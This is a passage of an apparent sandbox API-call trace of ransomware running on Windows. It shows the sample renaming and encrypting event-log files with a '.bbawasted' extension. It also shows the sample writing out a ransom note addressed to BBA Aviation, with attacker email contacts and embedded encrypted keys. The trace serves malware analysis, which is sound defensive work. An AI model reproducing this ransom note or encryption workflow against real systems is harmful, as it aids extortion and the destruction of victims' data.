(HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0198.458] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a61b8) returned 1 [0198.459] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0198.459] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0198.459] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0198.460] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0198.461] SetEndOfFile (hFile=0x28c) returned 1 [0198.461] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.461] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0198.461] lstrcpyW (in: lpString1=0x6aed7a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0198.461] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx.bbawasted")) returned 1 [0198.464] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0198.465] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0198.465] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0198.465] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0198.465] CloseHandle (hObject=0x280) returned 1 [0198.473] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0198.474] CloseHandle (hObject=0x294) returned 1 [0198.474] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0198.474] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a60a8) returned 1 [0198.475] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0198.475] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0198.475] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6680) returned 1 [0198.476] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0198.476] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0198.485] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0198.486] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0198.486] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0198.486] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]t3jrJlQQuRFDKU2/2RkylTxQmddmMZizh7mMSAmp0KQy7hJPkAjYCzx37zaF92IL\r\nfEL8hcPqxDhT/omuzclAqIjq1R/CVQSm+W/m7icraD5bRpuFHgaknwM7b3o4peh9\r\nvU8X5THOlS5MUQH1tg8ijNVeM7yhkcO7auNK8wsOYr9FaocqqXc12H6e9GiQ5C/s\r\n4zPff6RnEVeJexvd70DHc4rfcN8disWPTdA+EcSW9ODTIcoCivSsAIXQo49oxQYm\r\n3rEOO4+fLCMbXgOLeRYM+0RItlVKiybpgdBRaJQriyCGGDyhL5i8B2obvYeOdj2W\r\nJ8PgYH7gjxJUrsYQcOKN4jHkD0IYjuEgJzWlsRw/ALSPo3Zu/1skDJHaf4MsNUoC\r\nwqJpjZVxSPv67ENipXQN7yvBY8sb9S9sOcTXgEOKgloBgD/WzuzAY3MkVErmcUVF\r\n5aq0GdMXyhFO4lgAyfRp7ZH0l8D9U+905oLgZ2MBo8bIE2PII0Y9xAmPn5csqcIl\r\n9cYzh0lUKa/V1psqxCBm5GafDhJtD/kWyPOVf/wHUTqp3vM2wAHolX8VWqTJReeq\r\n2tRhVpOnoIeef+dAPLeMixgnGjURvJbBRlVRx8R/fdlmBCVIv8WgnMVtgU0WIvE8\r\nhGz0Mk5hS9cRcdjEwMZXH2oPvdxHGpqWIaoNJNMGn5s=[end_key]\r\nKEEP IT\r\n") returned 984 [0198.486] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0198.486] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0198.486] SetEndOfFile (hFile=0x28c) returned 1 [0198.489] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0198.489] CloseHandle (hObject=0x28c) returned 1 [0198.554] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0198.555] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69fdf8 | out: hHeap=0x660000) returned 1 [0198.555] _aulldvrm () returned 0x0 [0198.555] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a63d8) returned 1 [0198.556] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0198.556] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0198.556] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 54 [0198.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x276) returned 0x6aecf0 [0198.556] lstrcpyW (in: lpString1=0x6aed5c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0198.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0198.556] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a69b0) returned 1 [0198.557] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0198.557] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0198.557] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0198.558] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0198.559] SetEndOfFile (hFile=0x28c) returned 1 [0198.560] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.560] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0198.560] lstrcpyW (in: lpString1=0x6aed5c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0198.560] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx.bbawasted")) returned 1 [0198.560] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0198.561] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0198.561] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0198.561] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0198.562] CloseHandle (hObject=0x294) returned 1 [0198.578] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0198.578] CloseHandle (hObject=0x280) returned 1 [0198.578] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0198.579] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6bd0) returned 1 [0198.580] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0198.580] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0198.580] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6ce0) returned 1 [0198.581] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0198.581] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0198.647] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0198.647] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0198.647] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0198.647] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ZZRbBrbgFqFTMk9rX0Cz6TbASKm19ET8kpAVLDwip3Ybhu1L50cjqZanHQnTK4AJ\r\nSmeb4ubvKINktsdzZOYNGv7UUZ124IQvZB6J9847KvUjmwasYbTTa92LGLVLtCCv\r\nRlNM3N4yBY/Q7azVs0Ej4DnMt3LayKuKCSIKiEY8ROGKLWwuhiX2oBE9x5sPrisS\r\nvwEzELPr0PzcKasSZDIBzt0VSFxKiCKaE8Wc7G+VDPiAQyL7k0rHCqIBh7U58bVu\r\n2J5w613G5tCAwCD3p+WvnNEZodpUIFStUYk93tsVobnrHdZZGADixh/03cVwDMky\r\nd8BdEKjY5GGX9WtW5kgSBxCzp6r+G+4X9PsnJLLqsU739vPQPz+/ZTSnWf+L10sQ\r\nuiJCsX/U5bBvGj7tzP0NWWykF/zcSIw8DyWHdnnei4DB6iOYeG8wYAb8P0QVx/sI\r\nyy5g6cOWdYaNdlt8Wk4Zo1STjq2qw9PHSFQ101iF5rFff4xU49K2x9HlFrf2lpih\r\n1Fyas7FO0y52DFD95WA8OZhQIJdG/wV3RaLWWwQFCA7z07OJ9WLBafwxiwvgNp7b\r\nYFYklPVgJyWh/8ZFD932cYrhR/JLCshFGi9m6cS5p2SCv9HLexWXomJ/vEvl6fKQ\r\nAFuVPb8EzJ0DA2y6TYjaLeYrDzdVxIR9TfU0uLeF8Ai=[end_key]\r\nKEEP IT\r\n") returned 984 [0198.647] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0198.647] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0198.647] SetEndOfFile (hFile=0x28c) returned 1 [0198.650] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0198.650] CloseHandle (hObject=0x28c) returned 1 [0198.660] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0198.660] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69fee0 | out: hHeap=0x660000) returned 1 [0198.661] _aulldvrm () returned 0x0 [0198.661] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6020) returned 1 [0198.661] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0198.661] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0198.661] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 64 [0198.662] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x28a) returned 0x6aecf0 [0198.662] lstrcpyW (in: lpString1=0x6aed70, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0198.662] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0198.662] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a60a8) returned 1 [0198.663] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0198.663] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0198.663] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0198.669] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0198.670] SetEndOfFile (hFile=0x28c) returned 1 [0198.670] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.671] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0198.671] lstrcpyW (in: lpString1=0x6aed70, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0198.671] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx.bbawasted")) returned 1 [0198.672] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0198.672] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0198.673] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0198.673] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0198.673] CloseHandle (hObject=0x280) returned 1 [0198.729] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0198.729] CloseHandle (hObject=0x294) returned 1 [0198.729] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0198.729] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6818) returned 1 [0198.730] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0198.730] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0198.730] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a65f8) returned 1 [0198.731] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0198.731] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0198.742] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0198.742] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0198.742] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0198.742] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]i477RoZ5Pc04Sb6Jxb1+JCcqe5UgHdd2KUXHxjbZl3nIEV48TbOcFRz7e0bpZMiR\r\namX2+MIyESh62ijMGIHcMi8pCjhX/2uxH61HuxoqOba5i6biErU9htPUCQy9wBRR\r\ngAEB2pwr5WoCXaj/Wc5anj9Kp77DqTPjIbr1awH9Z5K6eT8SvSJeXgzgpP9pYtYm\r\nLpOYsY1GiJA1mAxxb8dKaxVaoigthLIL169921s99O2yia8ZOcGc98EeS9BZMk7Z\r\nLCRG2tgWpcELcOGwpEP5rnYLjuFDI/LO/t004ir1nqtkGGL8x8ojJVut1ZHOCZrA\r\nJQM7BbD9ghM/icVp3459YwOhHABfDIGcZIUjMi5RDDijE2BaEfeO/+vWCEEX4bo5\r\nUmLTXHdb/d1lGc2Vo4E48nMC+iWgRbQnPyKcrzPT/SdaFN15lv+0zwabGTkhmhXF\r\nE+Ms/wl9FOnzW+txdHqhZFsW3U9q01gK9QKRynk5YBcnYdx9h6T8YufZ16UQJkQG\r\nh1yPrF1t17zNEiHPnbLz9wzQD74k7c2E+uimBTjZox5gIdFu8VKpVVKyuwCJyEJ6\r\nQ654zMsm2rWV5fN9vhtT4j9RN7UQrVLlIKr+Io3YF+fIQUiqoQ20/HOhCeZZFauU\r\nWNy/IhoxYMDwvLsVtZZlFxgk/wWD3UOj8qupVSS9x8K=[end_key]\r\nKEEP IT\r\n") returned 984 [0198.742] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0198.742] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0198.743] SetEndOfFile (hFile=0x28c) returned 1 [0198.746] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0198.746] CloseHandle (hObject=0x28c) returned 1 [0198.748] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0198.748] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69ffa8 | out: hHeap=0x660000) returned 1 [0198.748] _aulldvrm () returned 0x0 [0198.748] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6240) returned 1 [0198.749] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0198.749] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0198.749] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 56 [0198.749] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6aecf0 [0198.749] lstrcpyW (in: lpString1=0x6aed60, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0198.749] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0198.749] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6928) returned 1 [0198.750] CryptGenRandom (in: hProv=0x6a6928, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0198.750] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0198.750] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0198.751] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0198.753] SetEndOfFile (hFile=0x28c) returned 1 [0198.753] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.753] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0198.753] lstrcpyW (in: lpString1=0x6aed60, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0198.753] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx.bbawasted")) returned 1 [0198.754] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0198.754] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0198.754] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0198.754] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0198.755] CloseHandle (hObject=0x294) returned 1 [0198.878] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0198.879] 